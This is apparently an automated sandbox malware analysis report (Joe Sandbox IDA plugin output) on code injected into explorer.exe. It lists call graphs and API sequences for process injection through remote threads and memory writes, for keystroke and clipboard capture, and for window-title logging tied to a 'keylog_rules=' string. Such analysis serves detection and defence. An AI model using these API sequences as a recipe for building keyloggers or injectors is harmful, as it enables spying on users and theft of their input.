                                                                                                                                                                                                                              callgraph 0 Function_02D517DC 23 Function_02D52A09 0->23 1 Function_02D5255C 2 Function_02D51ED8 3 Function_02D5275A 4 Function_02D52841 5 Function_02D524CC 6 Function_02D526C9 7 Function_02D525F1 8 Function_02D529E7 9 Function_02D51E66 32 Function_02D51CBF 9->32 10 Function_02D59AE0 11 Function_02D5276D 12 Function_02D52569 13 Function_02D529EB 37 Function_02D52724 13->37 14 Function_02D51FEA 15 Function_02D51016 15->3 15->4 15->6 15->11 15->13 19 Function_02D5288D 15->19 21 Function_02D5268F 15->21 15->23 31 Function_02D518BF 15->31 36 Function_02D510A5 15->36 15->37 45 Function_02D512AE 15->45 46 Function_02D526AE 15->46 47 Function_02D513AE 15->47 16 Function_02D52799 17 Function_02D51581 17->13 17->23 33 Function_02D5293E 17->33 34 Function_02D516B9 17->34 17->37 18 Function_02D51000 18->15 20 Function_02D5200D 20->13 20->23 42 Function_02D520A1 20->42 22 Function_02D5240F 22->4 24 Function_02D51E89 24->2 24->14 24->37 25 Function_02D5298A 26 Function_02D51FB4 41 Function_02D51E26 26->41 27 Function_02D51533 28 Function_02D529BD 29 Function_02D51BBD 30 Function_02D5243D 30->23 30->25 31->29 31->37 40 Function_02D51B26 31->40 33->13 33->23 34->0 34->13 35 Function_02D51F3A 35->9 35->14 35->26 35->28 36->3 36->4 36->6 36->11 36->13 36->19 36->21 36->23 36->31 36->37 36->45 36->46 38 Function_02D525A4 38->23 39 Function_02D53627 41->32 42->5 42->13 42->19 42->22 42->23 42->25 42->28 42->30 43 Function_02D5182D 43->13 43->20 43->23 43->38 44 Function_02D529AE 43->44 45->1 45->4 45->12 45->13 45->23 45->28 45->44 47->7 47->13 47->16 47->23 47->24 47->35 48 Function_02D5162B 48->34

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 02D52724: VirtualQuery.KERNEL32(00000000,?,0000001C,?,?,?,00000000,02D529F3,-00000001,02D5128C), ref: 02D52731
                                                                                                                                                                                                                                • Part of subcall function 02D52A09: GetProcessHeap.KERNEL32(00000008,0000A000,02D510BF), ref: 02D52A0C
                                                                                                                                                                                                                                • Part of subcall function 02D52A09: RtlAllocateHeap.NTDLL(00000000), ref: 02D52A13
                                                                                                                                                                                                                              • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 02D51038
                                                                                                                                                                                                                              • RtlMoveMemory.NTDLL(00000000,?,?), ref: 02D5106C
                                                                                                                                                                                                                              • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 02D51075
                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,02D51010), ref: 02D5107B
                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 02D510E7
                                                                                                                                                                                                                              • RtlMoveMemory.NTDLL(00000000,0000000C,-00000001), ref: 02D51155
                                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02D51160
                                                                                                                                                                                                                              • Process32First.KERNEL32(00000000,?), ref: 02D5117F
                                                                                                                                                                                                                              • CharLowerA.USER32(?), ref: 02D51199
                                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,explorer.exe), ref: 02D511B5
                                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 02D51212
                                                                                                                                                                                                                              • Process32Next.KERNEL32(00000000,00000128), ref: 02D5126C
                                                                                                                                                                                                                              • CloseHandle.KERNELBASE(00000000), ref: 02D5127F
                                                                                                                                                                                                                              • Sleep.KERNELBASE(000003E8), ref: 02D5129F
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000001B.00000002.3006742816.0000000002D51000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D51000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_2d51000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: MemoryMove$HeapProcessProcess32lstrcmpi$AllocateCharCloseCreateCurrentFirstHandleLowerNextQuerySectionSleepSnapshotToolhelp32UnmapViewVirtualwsprintf
                                                                                                                                                                                                                              • String ID: %s%s$explorer.exe$keylog_rules=$microsoftedgecp.exe$|:|
                                                                                                                                                                                                                              • API String ID: 3206029838-2805246637
                                                                                                                                                                                                                              • Opcode ID: 7313ebc53ee9b7545091ddffe33a21b6d7086c5489410c3cb9ef9b8011d35ca1
                                                                                                                                                                                                                              • Instruction ID: b1abf4a8a059108d3a9badbaf6fc694d802e9424844230d069f74caaefe69b99
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7313ebc53ee9b7545091ddffe33a21b6d7086c5489410c3cb9ef9b8011d35ca1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7C51E430A443309BDF55AF78E888B3A77AAEF44744F104918AD5987380DBF4DD09CE61

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 02D52A09: GetProcessHeap.KERNEL32(00000008,0000A000,02D510BF), ref: 02D52A0C
                                                                                                                                                                                                                                • Part of subcall function 02D52A09: RtlAllocateHeap.NTDLL(00000000), ref: 02D52A13
                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 02D510E7
                                                                                                                                                                                                                                • Part of subcall function 02D5276D: OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 02D52777
                                                                                                                                                                                                                                • Part of subcall function 02D5276D: MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,02D510FE), ref: 02D52789
                                                                                                                                                                                                                              • RtlMoveMemory.NTDLL(00000000,0000000C,-00000001), ref: 02D51155
                                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02D51160
                                                                                                                                                                                                                              • Process32First.KERNEL32(00000000,?), ref: 02D5117F
                                                                                                                                                                                                                              • CharLowerA.USER32(?), ref: 02D51199
                                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,explorer.exe), ref: 02D511B5
                                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 02D51212
                                                                                                                                                                                                                              • Process32Next.KERNEL32(00000000,00000128), ref: 02D5126C
                                                                                                                                                                                                                              • CloseHandle.KERNELBASE(00000000), ref: 02D5127F
                                                                                                                                                                                                                              • Sleep.KERNELBASE(000003E8), ref: 02D5129F
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000001B.00000002.3006742816.0000000002D51000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D51000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_2d51000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileHeapProcess32lstrcmpi$AllocateCharCloseCreateFirstHandleLowerMappingMemoryMoveNextOpenProcessSleepSnapshotToolhelp32Viewwsprintf
                                                                                                                                                                                                                              • String ID: %s%s$explorer.exe$keylog_rules=$microsoftedgecp.exe$|:|
                                                                                                                                                                                                                              • API String ID: 3018447944-2805246637
                                                                                                                                                                                                                              • Opcode ID: 71688346c33785177f3d17e2cf90be7109d4a91e91d840241578127ca2b6de29
                                                                                                                                                                                                                              • Instruction ID: c99a17390d7d7bed239c0d2232727f24c9e9143630651f4657e5fe489bd82797
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 71688346c33785177f3d17e2cf90be7109d4a91e91d840241578127ca2b6de29
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7841D630A443245BDF54EF749889A3E77AAEF88794F004A18AD5687380EFF4DD19CE61

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 122 2d59ae0-2d59ae5 123 2d59cad 122->123 124 2d59aeb-2d59af8 122->124 123->123 125 2d59b0a-2d59b0f 124->125 126 2d59b11 125->126 127 2d59b00-2d59b05 126->127 128 2d59b13 126->128 129 2d59b06-2d59b08 127->129 130 2d59b18-2d59b1a 128->130 129->125 129->126 131 2d59b23-2d59b27 130->131 132 2d59b1c-2d59b21 130->132 131->130 133 2d59b29 131->133 132->131 134 2d59b34-2d59b39 133->134 135 2d59b2b-2d59b32 133->135 136 2d59b48-2d59b4a 134->136 137 2d59b3b-2d59b44 134->137 135->130 135->134 140 2d59b53-2d59b57 136->140 141 2d59b4c-2d59b51 136->141 138 2d59b46 137->138 139 2d59bba-2d59bbd 137->139 138->136 142 2d59bc2-2d59bc5 139->142 143 2d59b60-2d59b62 140->143 144 2d59b59-2d59b5e 140->144 141->140 145 2d59bc7-2d59bc9 142->145 146 2d59b84-2d59b93 143->146 147 2d59b64 143->147 144->143 145->142 150 2d59bcb-2d59bce 145->150 148 2d59b95-2d59b9c 146->148 149 2d59ba4-2d59bb1 146->149 151 2d59b65-2d59b67 147->151 148->148 152 2d59b9e 148->152 149->149 153 2d59bb3-2d59bb5 149->153 150->142 154 2d59bd0-2d59bec 150->154 155 2d59b70-2d59b74 151->155 156 2d59b69-2d59b6e 151->156 152->129 153->129 154->145 157 2d59bee 154->157 155->151 158 2d59b76 155->158 156->155 161 2d59bf4-2d59bf8 157->161 159 2d59b81 158->159 160 2d59b78-2d59b7f 158->160 159->146 160->151 160->159 162 2d59c3f-2d59c42 161->162 163 2d59bfa-2d59c10 LoadLibraryA 161->163 164 2d59c45-2d59c4c 162->164 165 2d59c11-2d59c16 163->165 167 2d59c70-2d59ca0 VirtualProtect * 2 164->167 168 2d59c4e-2d59c50 164->168 165->161 166 2d59c18-2d59c1a 165->166 169 2d59c23-2d59c30 GetProcAddress 166->169 170 2d59c1c-2d59c22 166->170 173 2d59ca4-2d59ca8 167->173 171 2d59c63-2d59c6e 168->171 172 2d59c52-2d59c61 168->172 174 2d59c32-2d59c37 169->174 175 2d59c39-2d59c3c 169->175 170->169 171->172 172->164 173->173 176 2d59caa 173->176 174->165 176->123
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000001B.00000002.3006742816.0000000002D58000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D58000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_2d58000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 6a54b34bd5fa993069762862445138c5e70903c70d166329de2abf7932eadd0a
                                                                                                                                                                                                                              • Instruction ID: 7dc86af2a1a709961465faa98f8e9db759f7f855900149761e5f9698c74c21c8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6a54b34bd5fa993069762862445138c5e70903c70d166329de2abf7932eadd0a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7F51C3B1A44A62CAEF218A688CE07F5B794EB41225B180729DDE6C73C5E7F45C06C7D0

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 177 2d5276d-2d5277f OpenFileMappingA 178 2d52794-2d52798 177->178 179 2d52781-2d52791 MapViewOfFile 177->179 179->178
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 02D52777
                                                                                                                                                                                                                              • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,02D510FE), ref: 02D52789
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000001B.00000002.3006742816.0000000002D51000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D51000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_2d51000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$MappingOpenView
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3439327939-0
                                                                                                                                                                                                                              • Opcode ID: c232a4563ef61fa24d50d10f1b9822c0d865dae20827bc7facd365808d59ef09
                                                                                                                                                                                                                              • Instruction ID: 7a6c5a877aa81aa9b7a547644de9eb8fa3d7018a0031302f705c12990dc212c6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c232a4563ef61fa24d50d10f1b9822c0d865dae20827bc7facd365808d59ef09
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1FD0E232B41331ABE6B45E7A6C0CF83AE9DDF86AE1B110025B90DD2240D6A08820C2B0

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 180 2d52a09-2d52a19 GetProcessHeap RtlAllocateHeap
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,0000A000,02D510BF), ref: 02D52A0C
                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02D52A13
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000001B.00000002.3006742816.0000000002D51000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D51000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_2d51000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Heap$AllocateProcess
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1357844191-0
                                                                                                                                                                                                                              • Opcode ID: 7a368b786fcbc7a8a13702cda322b36375d4395e0e1b3b6701cfede822662a92
                                                                                                                                                                                                                              • Instruction ID: ad5e4c3a52467a696dd9d63a1aa3afd4e74b21737e13a122268f546da1301ffb
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7a368b786fcbc7a8a13702cda322b36375d4395e0e1b3b6701cfede822662a92
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 98A002B1E903106BDDC55FA8990DF157758AF44781F104D847246C51409DF558649721

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 181 2d529bd-2d529cd VirtualAlloc
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,00040744,00003000,00000040,02D512D9,00000000,00000000,?,00000001), ref: 02D529C7
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000001B.00000002.3006742816.0000000002D51000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D51000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_2d51000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4275171209-0
                                                                                                                                                                                                                              • Opcode ID: 0d167c7fef58bbb9ce17e4862f38974d4d531be059276919789d31aba630436f
                                                                                                                                                                                                                              • Instruction ID: fffb6c52e0d9d9803e4e6072f2babddeb31b11e843bf216696fbf4eba83702b3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0d167c7fef58bbb9ce17e4862f38974d4d531be059276919789d31aba630436f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F6A002B0FD6310BAFDA99B559D1FF152B189B40F52F204584B30A7C2C056E4B910853D

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 182 2d529ae-2d529bc VirtualFree
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,02D513A4), ref: 02D529B6
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000001B.00000002.3006742816.0000000002D51000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D51000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_2d51000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FreeVirtual
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1263568516-0
                                                                                                                                                                                                                              • Opcode ID: 4ea226c7f6d12662e99e74db72fc65eecf56b86c7f128e3922a808cccfcbce7c
                                                                                                                                                                                                                              • Instruction ID: 6cbb5963a33651d3060d2f4db90bf955aa098edd949b7779b863320e8fe97505
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4ea226c7f6d12662e99e74db72fc65eecf56b86c7f128e3922a808cccfcbce7c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F0A00270FD071076EDB55B245D0AF0567546B40B42F304D847245A91C049E5A4588A18

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 02D52724: VirtualQuery.KERNEL32(00000000,?,0000001C,?,?,?,00000000,02D529F3,-00000001,02D5128C), ref: 02D52731
                                                                                                                                                                                                                              • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,?,00000000,00000001), ref: 02D518F4
                                                                                                                                                                                                                              • NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 02D5192F
                                                                                                                                                                                                                              • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 02D519BF
                                                                                                                                                                                                                              • RtlMoveMemory.NTDLL(00000000,02D53638,00000016), ref: 02D519E6
                                                                                                                                                                                                                              • RtlMoveMemory.NTDLL(-00000016,00000363), ref: 02D51A0E
                                                                                                                                                                                                                              • NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 02D51A1E
                                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02D51A38
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?,00000000), ref: 02D51A40
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02D51A4E
                                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02D51A55
                                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll,atan,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 02D51A6B
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 02D51A72
                                                                                                                                                                                                                              • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 02D51A88
                                                                                                                                                                                                                              • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 02D51AB2
                                                                                                                                                                                                                              • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02D51AC5
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02D51ACC
                                                                                                                                                                                                                              • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02D51AD3
                                                                                                                                                                                                                              • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 02D51AE7
                                                                                                                                                                                                                              • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02D51AFE
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02D51B0B
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02D51B11
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02D51B17
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000), ref: 02D51B1A
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000001B.00000002.3006742816.0000000002D51000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D51000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_2d51000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
                                                                                                                                                                                                                              • String ID: atan$ntdll$opera_shared_counter
                                                                                                                                                                                                                              • API String ID: 1066286714-2737717697
                                                                                                                                                                                                                              • Opcode ID: 88db4f92f20844b9433b1940d5c5f27080d5eaeb43c4e542bc29983c394459f8
                                                                                                                                                                                                                              • Instruction ID: e5225db457e56ba1666ca3ecfac90e531fb7032104fedb9b3e91e688a9c11d4f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 88db4f92f20844b9433b1940d5c5f27080d5eaeb43c4e542bc29983c394459f8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F3617B71A44365AFDB50DF289C84E6BBBEDEF89794F000959F94993340DBA0DD04CB62

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 02D527B5
                                                                                                                                                                                                                              • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 02D527CD
                                                                                                                                                                                                                              • lstrlen.KERNEL32(?,00000000), ref: 02D527D5
                                                                                                                                                                                                                              • CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 02D527E0
                                                                                                                                                                                                                              • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 02D527FA
                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 02D52811
                                                                                                                                                                                                                              • CryptDestroyHash.ADVAPI32(?), ref: 02D5282A
                                                                                                                                                                                                                              • CryptReleaseContext.ADVAPI32(?,00000000), ref: 02D52834
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000001B.00000002.3006742816.0000000002D51000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D51000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_2d51000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
                                                                                                                                                                                                                              • String ID: %02X
                                                                                                                                                                                                                              • API String ID: 3341110664-436463671
                                                                                                                                                                                                                              • Opcode ID: 655c5cdeca29055038d6aa125c4a6aee41e155cfba23067d1c52c4e4b11bee86
                                                                                                                                                                                                                              • Instruction ID: c632627e831f1d3159331fa39ba0c1c3b9cf250d50d2f32f4cc8ae4ec364a722
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 655c5cdeca29055038d6aa125c4a6aee41e155cfba23067d1c52c4e4b11bee86
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C2115171D40218BFDB519FA9DC48EAEBF7CEF44355F2044A5F905D2200D7B14E559B60
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetKeyboardState.USER32(?), ref: 02D51652
                                                                                                                                                                                                                              • ToUnicode.USER32(0000001B,?,?,?,00000009,00000000), ref: 02D5167A
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000001B.00000002.3006742816.0000000002D51000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D51000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_2d51000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: KeyboardStateUnicode
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3453085656-3916222277
                                                                                                                                                                                                                              • Opcode ID: 661f65d2ec45e60c42557923e186276aa720ea52eb324122621a93f8f5bef9e5
                                                                                                                                                                                                                              • Instruction ID: 28579b40f05b97a9eee8ef2ec1a8a13f3a0da29081e747e0dbd7895e1ad935bd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 661f65d2ec45e60c42557923e186276aa720ea52eb324122621a93f8f5bef9e5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C3016D32D002699ADF34DA65D985BBB73FCAF45B04F08441AED09A2240D7B0ED49CAA2

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RtlZeroMemory.NTDLL(02D55013,0000001C), ref: 02D513C8
                                                                                                                                                                                                                              • VirtualQuery.KERNEL32(02D513AE,?,0000001C), ref: 02D513DA
                                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 02D5140B
                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(00000004), ref: 02D5141C
                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 02D51433
                                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 02D51448
                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02D5144E
                                                                                                                                                                                                                              • RtlInitializeCriticalSection.NTDLL(02D5582C), ref: 02D51465
                                                                                                                                                                                                                              • Sleep.KERNEL32(000001F4), ref: 02D51489
                                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(user32.dll,TranslateMessage), ref: 02D514A6
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 02D514AF
                                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(user32.dll,GetClipboardData), ref: 02D514D0
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 02D514D3
                                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 02D514F1
                                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_0000082D,00000000,00000000,00000000), ref: 02D5150D
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02D51514
                                                                                                                                                                                                                              • RtlExitUserThread.NTDLL(00000000), ref: 02D5152A
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000001B.00000002.3006742816.0000000002D51000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D51000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_2d51000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: HandleModule$AddressCreateProcThread$CloseCriticalCurrentErrorExitFileInitializeLastMemoryMutexNameProcessQuerySectionSleepUserVirtualZerowsprintf
                                                                                                                                                                                                                              • String ID: %s%d%d%d$GetClipboardData$TranslateMessage$kernel32.dll$user32.dll
                                                                                                                                                                                                                              • API String ID: 3628807430-1779906909
                                                                                                                                                                                                                              • Opcode ID: 499550e3e21a31d41b8d7a336987db1c79ffee8072c19a0832517ebe80ca3108
                                                                                                                                                                                                                              • Instruction ID: 0778643c709492c97f6e40b91fbf1ba8a40d041c57d2a4192bf641dd69f6b2b5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 499550e3e21a31d41b8d7a336987db1c79ffee8072c19a0832517ebe80ca3108
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7541A070E80334ABEF51AF69BC59A1A3BA9EF44795B504858FD0686340DBF5DC188BB0

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RtlEnterCriticalSection.NTDLL(02D5582C), ref: 02D516C4
                                                                                                                                                                                                                              • lstrlenW.KERNEL32 ref: 02D516DB
                                                                                                                                                                                                                              • lstrlenW.KERNEL32 ref: 02D516F3
                                                                                                                                                                                                                              • wsprintfW.USER32 ref: 02D51743
                                                                                                                                                                                                                              • GetForegroundWindow.USER32 ref: 02D5174E
                                                                                                                                                                                                                              • GetWindowTextW.USER32(00000000,02D55850,00000800), ref: 02D51767
                                                                                                                                                                                                                              • GetClassNameW.USER32(00000000,02D55850,00000800), ref: 02D51774
                                                                                                                                                                                                                              • lstrcmpW.KERNEL32(02D55020,02D55850), ref: 02D51781
                                                                                                                                                                                                                              • lstrcpyW.KERNEL32(02D55020,02D55850), ref: 02D5178D
                                                                                                                                                                                                                              • wsprintfW.USER32 ref: 02D517AD
                                                                                                                                                                                                                              • lstrcatW.KERNEL32 ref: 02D517C6
                                                                                                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(02D5582C), ref: 02D517D3
                                                                                                                                                                                                                              Strings
